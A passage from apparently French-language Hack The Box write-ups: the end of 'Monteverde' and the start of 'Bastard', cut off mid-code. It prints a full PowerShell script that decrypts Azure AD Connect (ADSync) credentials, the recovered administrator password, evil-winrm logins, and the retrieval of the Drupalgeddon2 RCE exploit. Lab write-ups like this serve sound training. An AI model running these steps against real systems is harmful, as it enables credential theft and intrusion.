</div><h3 id="evil-winrm--mhope---user-flag">Evil-winrm : mhope -&gt; user flag </h3><p>On obtient un accès via evil winrm en tant que <strong>mhope</strong> avec le mot de passe trouvé précédemment <code>4n0therD4y@n0th3r$</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -u mhope -p <span class="s1">&#39;4n0therD4y@n0th3r$&#39;</span> -i <span class="s2">&#34;10.10.10.172&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>esktop&gt; cat <span class="s2">&#34;C:/Users/mhope/Desktop/user.txt&#34;</span> </span></span><span class="line"><span class="cl">4437.....5f01 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mhope-group--azure-admins">mhope Group : Azure Admins </h3><p>On observe que mhope fait partie du groupe <code>Azure Admins</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; whoami /groups </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GROUP INFORMATION </span></span><span class="line"><span class="cl">----------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Group Name Type SID <span class="nv">Attributes</span> </span></span><span class="line"><span class="cl"><span class="o">=======================================</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">MEGABANK<span class="se">\A</span>zure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="sql-server-adsync-database">SQL Server: ADSync database </h3><p>On observer une processus &ldquo;sqlservr&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; Get-Process sqlservr </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Handles NPM<span class="o">(</span>K<span class="o">)</span> PM<span class="o">(</span>K<span class="o">)</span> WS<span class="o">(</span>K<span class="o">)</span> CPU<span class="o">(</span>s<span class="o">)</span> Id SI ProcessName </span></span><span class="line"><span class="cl">------- ------ ----- ----- ------ -- -- ----------- </span></span><span class="line"><span class="cl"> <span class="m">832</span> <span class="m">114</span> <span class="m">406004</span> <span class="m">275560</span> <span class="m">3436</span> <span class="m">0</span> sqlservr </span></span></code></pre></td></tr></table> </div> </div><p>On remarque que <strong>sqlcmd</strong> est installé et on observe une base de donnée &ldquo;ADSync&rdquo;. On peut bien effectuer des requêtes vers la base de donnée sans utiliser de user/password :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; sqlcmd -Q <span class="s1">&#39;SELECT name FROM sys.databases&#39;</span> </span></span><span class="line"><span class="cl">name </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">master </span></span><span class="line"><span class="cl">tempdb </span></span><span class="line"><span class="cl">model </span></span><span class="line"><span class="cl">msdb </span></span><span class="line"><span class="cl">ADSync </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">(</span><span class="m">5</span> rows affected<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="script">Script </h3><p>On trouve un script de <code>xpn</code> sur github. Ce script permet de se connecter à la base de donnée <code>ADSync</code>, d&rsquo;extraire la configuration (chiffrée), puis de la déchiffrer. On obtient alors le mot de passe de l&rsquo;administrator. Le script est basé sur l&rsquo;utilisation des infos de la base de données puis du binaire &lsquo;C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll&rsquo; pour réussir à récupérer la configuration contenant les creds administrateur :</p> <p><a class="link" href="https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545" target="_blank" rel="noopener" >https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545</a></p> <p>En utilisant le script, on remarque qu&rsquo;il ne fonctionne pas. Les lignes de code permettant la connection à la base de données semblent incorrectes :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; <span class="nv">$client</span> <span class="o">=</span> new-object System.Data.SqlClient.SqlConnection -ArgumentList <span class="s2">&#34;Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.Open<span class="o">()</span> </span></span></code></pre></td></tr></table> </div> </div><p>En cherchant sur internet, j&rsquo;ai pu corriger la ligne de code permettant la connexion à la bdd. De plus, j&rsquo;ai pu remarquer certaines erreurs avec des guillemets dans un format suspect. J&rsquo;ai bien remplacé les guillemets par &ldquo;&rsquo;&rdquo; ou &lsquo;&quot;&rsquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Write-Host <span class="s2">&#34;AD Connect Sync Credential Extract POC&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$SQLServer</span> <span class="o">=</span> <span class="s2">&#34;127.0.0.1&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$SQLDBName</span> <span class="o">=</span> <span class="s2">&#34;ADSync&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span> <span class="o">=</span> New-Object System.Data.SqlClient.SqlConnection </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.ConnectionString <span class="o">=</span> <span class="s2">&#34;Server = </span><span class="nv">$SQLServer</span><span class="s2">; Database = </span><span class="nv">$SQLDBName</span><span class="s2">; Integrated Security = True&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.Open<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span> <span class="o">=</span> <span class="nv">$client</span>.CreateCommand<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span>.CommandText <span class="o">=</span> <span class="s2">&#34;SELECT keyset_id, instance_id, entropy FROM mms_server_configuration&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span> <span class="o">=</span> <span class="nv">$cmd</span>.ExecuteReader<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Read<span class="o">()</span> <span class="p">|</span> Out-Null </span></span><span class="line"><span class="cl"><span class="nv">$key_id</span> <span class="o">=</span> <span class="nv">$reader</span>.GetInt32<span class="o">(</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$instance_id</span> <span class="o">=</span> <span class="nv">$reader</span>.GetGuid<span class="o">(</span>1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$entropy</span> <span class="o">=</span> <span class="nv">$reader</span>.GetGuid<span class="o">(</span>2<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Close<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span> <span class="o">=</span> <span class="nv">$client</span>.CreateCommand<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span>.CommandText <span class="o">=</span> <span class="s2">&#34;SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = &#39;AD&#39;&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span> <span class="o">=</span> <span class="nv">$cmd</span>.ExecuteReader<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Read<span class="o">()</span> <span class="p">|</span> Out-Null </span></span><span class="line"><span class="cl"><span class="nv">$config</span> <span class="o">=</span> <span class="nv">$reader</span>.GetString<span class="o">(</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$crypted</span> <span class="o">=</span> <span class="nv">$reader</span>.GetString<span class="o">(</span>1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Close<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">add-type -path <span class="s1">&#39;C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll&#39;</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span> <span class="o">=</span> New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.LoadKeySet<span class="o">(</span><span class="nv">$entropy</span>, <span class="nv">$instance_id</span>, <span class="nv">$key_id</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$key</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.GetActiveCredentialKey<span class="o">([</span>ref<span class="o">]</span><span class="nv">$key</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$key2</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.GetKey<span class="o">(</span>1, <span class="o">[</span>ref<span class="o">]</span><span class="nv">$key2</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$decrypted</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$key2</span>.DecryptBase64ToString<span class="o">(</span><span class="nv">$crypted</span>, <span class="o">[</span>ref<span class="o">]</span><span class="nv">$decrypted</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Write-Host <span class="nv">$decrypted</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$domain</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$config</span> -XPath <span class="s2">&#34;//parameter[@name=&#39;forest-login-domain&#39;]&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Domain&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"><span class="nv">$username</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$config</span> -XPath <span class="s2">&#34;//parameter[@name=&#39;forest-login-user&#39;]&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Username&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"><span class="nv">$password</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$decrypted</span> -XPath <span class="s2">&#34;//attribute&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Password&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Domain: &#34;</span> + <span class="nv">$domain</span>.Domain<span class="o">)</span> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Username: &#34;</span> + <span class="nv">$username</span>.Username<span class="o">)</span> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Password: &#34;</span> + <span class="nv">$password</span>.Password<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="output">Output </h3><p>Après correction des guillements, on execute le .ps1 et obtient les creds admin :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; .<span class="se">\d</span>ecrypt.ps1 </span></span><span class="line"><span class="cl">AD Connect Sync Credential Extract POC </span></span><span class="line"><span class="cl">&lt;encrypted-attributes&gt; </span></span><span class="line"><span class="cl"> &lt;attribute <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;password&#34;</span>&gt;d0m@in4dminyeah!&lt;/attribute&gt; </span></span><span class="line"><span class="cl">&lt;/encrypted-attributes&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Domain: MEGABANK.LOCAL </span></span><span class="line"><span class="cl">Username: administrator </span></span><span class="line"><span class="cl">Password: d0m@in4dminyeah! </span></span></code></pre></td></tr></table> </div> </div><h3 id="administrator-pwned">Administrator pwned </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>Jul 20, <span class="m">2025</span> - 14:56:12 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Monteverde <span class="c1"># evil-winrm -u &#34;administrator&#34; -p &#39;d0m@in4dminyeah!&#39; -i 10.10.10.172</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">9f15.....9bf4 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>Toujours bien vérifier les scripts trouvés. Debug puis trouver l&rsquo;erreur. Attention au guillemets suspects, toujours remplacer par &lsquo;&quot;&rsquo; ou &lsquo;&quot;&rsquo;.</li> </ul>HTB | Bastardhttps://leopoldabgn.github.io/writeups/p/bastard-htb/Fri, 11 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/bastard-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Bastard cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Bastard</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.9</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -p- -An -vvv 10.10.10.9 </span></span><span class="line"><span class="cl">Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-07-11 15:53 CEST </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORTSTATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">127</span> Microsoft IIS httpd 7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: OPTIONS TRACE GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">36</span> disallowed entries </span></span><span class="line"><span class="cl"><span class="p">|</span> /includes/ /misc/ /modules/ /profiles/ /scripts/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt </span></span><span class="line"><span class="cl"><span class="p">|</span> /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php </span></span><span class="line"><span class="cl"><span class="p">|</span> /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /user/register/ /user/password/ /user/login/ /user/logout/ /?q<span class="o">=</span>admin/ </span></span><span class="line"><span class="cl"><span class="p">|</span> /?q<span class="o">=</span>comment/reply/ /?q<span class="o">=</span>filter/tips/ /?q<span class="o">=</span>node/add/ /?q<span class="o">=</span>search/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_/?q<span class="o">=</span>user/password/ /?q<span class="o">=</span>user/register/ /?q<span class="o">=</span>user/login/ /?q<span class="o">=</span>user/logout/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-generator: Drupal <span class="m">7</span> <span class="o">(</span>http://drupal.org<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Welcome to Bastard <span class="p">|</span> Bastard </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49154/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">Warning: OSScan results may be unreliable because we could not find at least <span class="m">1</span> open and <span class="m">1</span> closed port </span></span><span class="line"><span class="cl">Device type: general purpose<span class="p">|</span>phone<span class="p">|</span>specialized </span></span><span class="line"><span class="cl">Running <span class="o">(</span>JUST GUESSING<span class="o">)</span>: Microsoft Windows 8<span class="p">|</span>Phone<span class="p">|</span>2008<span class="p">|</span>7<span class="p">|</span>8.1<span class="p">|</span>Vista<span class="p">|</span><span class="m">2012</span> <span class="o">(</span>92%<span class="o">)</span> </span></span><span class="line"><span class="cl">OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2 </span></span><span class="line"><span class="cl">OS fingerprint not ideal because: Missing a closed TCP port so results incomplete </span></span><span class="line"><span class="cl">Aggressive OS guesses: Microsoft Windows 8.1 Update <span class="m">1</span> <span class="o">(</span>92%<span class="o">)</span>, Microsoft Windows Phone 7.5 or 8.0 <span class="o">(</span>92%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> or Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 or Windows 8.1 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Server <span class="m">2008</span> R2 SP1 or Windows <span class="m">8</span> <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> SP1 or Windows Server <span class="m">2008</span> R2 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows <span class="m">7</span> SP1 or Windows Server <span class="m">2008</span> SP2 or <span class="m">2008</span> R2 SP1 <span class="o">(</span>91%<span class="o">)</span>, Microsoft Windows Vista SP0 or SP1, Windows Server <span class="m">2008</span> SP1, or Windows <span class="m">7</span> <span class="o">(</span>91%<span class="o">)</span> </span></span><span class="line"><span class="cl">No exact OS matches <span class="k">for</span> host <span class="o">(</span><span class="nb">test</span> conditions non-ideal<span class="o">)</span>. </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="drupal-754">Drupal 7.54 </h3><p>On découvre sur le port 80 une page de login. Il est mentionné qu&rsquo;il s&rsquo;agit d&rsquo;un site web Drupal. On trouve la version de Drupal dans un fichier changelog.txt :</p> <blockquote> <p>http://10.10.10.9/changelog.txt Drupal 7.54, 2017-02-01</p> </blockquote> <h3 id="cve-2018-7600--drupalgeddon2">CVE-2018-7600 | drupalgeddon2 </h3><p>En utilisant searchsploit, on trouve une RCE qui ne necessite pas d&rsquo;authentification et qui fonctionne pour les versions avant 7.58 (donc OK pour 7.54).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ searchsploit drupal 7.54 </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">Drupal &lt; 7.58 / &lt; 8.3.9 / &lt; 8.4.6 / &lt; 8.5.1 - <span class="s1">&#39;Drupalgeddon2&#39;</span> Remote Code Execution <span class="p">|</span> php/webapps/44449.rb </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ searchsploit -m php/webapps/44449.rb </span></span><span class="line"><span class="cl"> Exploit: Drupal &lt; 7.58 / &lt; 8.3.9 / &lt; 8.4.6 / &lt; 8.5.1 - <span class="s1">&#39;Drupalgeddon2&#39;</span> Remote Code Execution </span></span><span class="line"><span class="cl"> URL: https://www.exploit-db.com/exploits/44449 </span></span><span class="line"><span class="cl"> Path: /opt/tools/exploitdb/exploits/php/webapps/44449.rb </span></span><span class="line"><span class="cl"> Codes: CVE-2018-7600 </span></span><span class="line"><span class="cl"> Verified: True </span></span><span class="line"><span class="cl">File Type: Ruby script, ASCII text </span></span><span class="line"><span class="cl">Copied to: /workspace/drupwn/44449.rb </span></span></code></pre></td></tr></table> </div> </div><p>On lance l&rsquo;exploitation, et on obtient directement un shell non-interactif sur lequel on peut executer des commandes.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 